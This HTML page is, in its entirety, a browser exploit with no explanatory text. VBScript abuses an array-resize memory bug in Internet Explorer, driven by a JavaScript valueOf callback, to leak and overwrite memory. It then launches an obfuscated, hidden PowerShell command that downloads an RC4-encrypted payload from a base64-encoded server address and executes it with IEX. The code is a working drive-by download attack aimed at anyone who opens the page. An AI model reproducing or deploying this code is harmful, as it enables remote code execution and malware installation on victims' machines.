
<html>
<head>
<meta http-equiv="x-ua-compatible" content="IE=10">
</head>
<body>
    <script type="text/vbscript">
        Dim aw
        Dim plunge(32)
        Dim y(32)
        prefix = "%u4141%u4141"
        d = prefix & "%u0016%u4141%u4141%u4141%u4242%u4242"
        b = String(64000, "D")
        c = d & b
        x = UnEscape(c)
        
        Class ArrayWrapper
            Dim A()
            Private Sub Class_Initialize
                  ReDim Preserve A(1, 2000)
            End Sub
            
            Public Sub Resize()
                ReDim Preserve A(1, 1)
            End Sub
        End Class
        
        Class Dummy
        End Class
        
        Function getAddr (arg1, s)
            aw = Null
            Set aw = New ArrayWrapper
        
            For i = 0 To 32
                Set plunge(i) = s
            Next
        
            Set aw.A(arg1, 2) = s
        
            Dim addr
            Dim i
            For i = 0 To 31
                If Asc(Mid(y(i), 3, 1)) = VarType(s) Then
                   addr = strToInt(Mid(y(i), 3 + 4, 2))
                End If
                y(i) = Null
            Next
        
            If addr = Null Then
                document.location.href = document.location.href
                Return
            End If
            getAddr = addr
        End Function
        
        Function leakMem (arg1, addr)
            d = prefix & "%u0008%u4141%u4141%u4141"
            c = d & intToStr(addr) & b
            x = UnEscape(c)
        
            aw = Null
            Set aw = New ArrayWrapper
        
            Dim o
            o = aw.A(arg1, 2)
        
            leakMem = o
        End Function
        
        Sub overwrite (arg1, addr)
            d = prefix & "%u400C%u0000%u0000%u0000"
            c = d & intToStr(addr) & b
            x = UnEscape(c)
        
            aw = Null
            Set aw = New ArrayWrapper
        
        
            aw.A(arg1, 2) = CSng(0)
        End Sub
        
        Function exploit (arg1)
            Dim addr
            Dim csession
            Dim olescript
            Dim mem
        
        
            Set dm = New Dummy
        
            addr = getAddr(arg1, dm)
        
            mem = leakMem(arg1, addr + 8)
            csession = strToInt(Mid(mem, 3, 2))
        
            mem = leakMem(arg1, csession + 4)
            olescript = strToInt(Mid(mem, 1, 2))
            overwrite arg1, olescript + &H174
        Set Object = CreateObject("Wscript.Shell")
        Object.run("Cmd   /c "SeT   fzRQ=   ${p`72}  =[type]("{0}{1}{2}{3}{4}{5}"-f'sySTEm.Net','.serVicepoInTmAN','A','g','E','r') ;${2F`Qw}=  [TYPE]("{2}{0}{3}{1}"-F'enCOdi','g','TEXT.','N') ;    seT-ItEm ('vAri'+'AbLE'+':LG'+'y')  ( [TYPE]("{0}{1}{2}" -F'CON','Ver','t') )  ;   SET ("H"+"87")  (  [Type]("{5}{3}{1}{0}{2}{4}" -F'.Web','T','rE','Em.nE','qUEsT','Syst') )  ;   SEt-VARIAblE ("i9"+"P") ([tyPe]("{1}{4}{3}{5}{0}{2}" -F'd','s','enTIAlcAChe','M.nEt.c','yStE','rE')  ); ${X`B`lOc0}= [tyPe]("{3}{1}{2}{0}"-F'NcODing','XT.','E','SYSteM.te'); If(${PsV`E`RsIONT`A`BLe}."P`S`VE`RSIOn"."ma`JOR" -ge 3){};  ${P`72}::"EXP`ECT`100contiN`UE"=0;${w`c}=.("{1}{2}{0}" -f'bject','Ne','w-O') ("{3}{1}{5}{0}{4}{2}"-f'Net.WebC','stem','ent','Sy','li','.');${u}=("{15}{13}{9}{0}{10}{1}{7}{2}{14}{12}{4}{3}{6}{11}{8}{5}" -f'.','Windows N','6.','.0;','nt/7','cko',' rv:','T ',' Ge','/5','0 (','11.0) like','4; Tride','illa','1; WOW6','Moz');${S`eR}=$( ( LS vARiABle:2fqw)."V`ALuE"::"UN`iC`oDE"."G`ETsTrI`Ng"( (  GeT-varIABLE ("L"+"GY"))."vA`lUe"::("{2}{0}{1}{3}"-f'ase64','StRIn','FRomB','G').Invoke(("{3}{12}{7}{0}{1}{2}{4}{5}{10}{6}{9}{11}{8}"-f 'LwAxA','DAAL','gAwAC4AMg','aAB0AH','AuADE','ANQA6','D','6AC8A','DUA','Q','A','ANAA0A','QAcAA'))));${t}=("{0}{1}{2}"-f '/n','ews','.php');${W`c}."H`eADers".("{1}{0}" -f'dd','A').Invoke(("{0}{1}{3}{2}"-f 'Us','er-Age','t','n'),${u});${WC}."pr`OXY"= (variaBLe ("h"+"87") -valUeo )::"DefaU`LT`WE`BpROxy";${wc}."P`Roxy"."C`RE`D`eNTIals" =   (  GeT-VArIaBLE  ("I9"+"p")  -va)::"DEFAUlTNeTWoRkcr`EdE`N`T`IALs";${sC`RIPt:`PRO`xY} = ${w`C}."prO`XY";${K}= ( Ls  VARiAbLe:xbLoc0 )."Va`luE"::"A`sCiI".("{0}{2}{1}" -f'Ge','tes','tBy').Invoke('s7k^^~lW2q0SA}oy.G^&t;M5CvUb^|fV^>(z');${r}={${D},${K}=${A`RGs};${s}=0..255;0..255^|^&('%'){${J}=(${j}+${s}[${_}]+${k}[${_}%${k}."CO`UNT"])%256;${s}[${_}],${S}[${J}]=${s}[${j}],${s}[${_}]};${D}^|^&('%'){${I}=(${i}+1)%256;${h}=(${h}+${s}[${i}])%256;${S}[${I}],${S}[${h}]=${S}[${h}],${s}[${I}];${_}-bxor${S}[(${s}[${i}]+${s}[${H}])%256]}};${WC}."head`E`Rs".("{0}{1}"-f 'A','dd').Invoke(("{2}{0}{1}" -f'ok','ie','Co'),("{0}{4}{3}{8}{1}{7}{5}{6}{2}"-f 'o','oI=NHb9Y1ewVCvL0fXg','=','aTsBJ','dI','9','BpnNo','F1yEQ','oPM'));${d`ATa}=${wc}.("{1}{2}{0}" -f'wnloadData','D','o').Invoke(${S`ER}+${T});${I`V}=${d`ATa}[0..3];${d`ATA}=${d`Ata}[4..${DA`Ta}."Le`NgtH"];-join[Char[]](^& ${R} ${D`Ata} (${i`V}+${K}))^|^&("{1}{0}"-f'X','IE')  &&  SEt  gENsr=Echo IEX ([EnVironMent]::gETeNVironmeNtvariablE('fZRQ','PRoCESS'))  ^|POwErsHEll  -EXecUTIO  BYpAsS -nOprofI  -NoE -NONiNTErActive  -wi  HiddeN     -&&Cmd   /c %GENsR%"")
        End Function

        Function triggerBug
            aw.Resize()
            Dim i
            For i = 0 To 32
                ' 24000x2 + 6 = 48006 bytes
                y(i) = Mid(x, 1, 24000)
            Next
        End Function
    </script>
        
    <script type="text/javascript">
        function strToInt(s)
        {
            return s.charCodeAt(0) | (s.charCodeAt(1) << 16);
        }
        function intToStr(x)
        {
            return String.fromCharCode(x & 0xffff) + String.fromCharCode(x >> 16);
        }
        var o;
        o = {"valueOf": function () {
                triggerBug();
                return 1;
            }};
        setTimeout(function() {exploit(o);}, 50);
    </script>
</body>
</html>
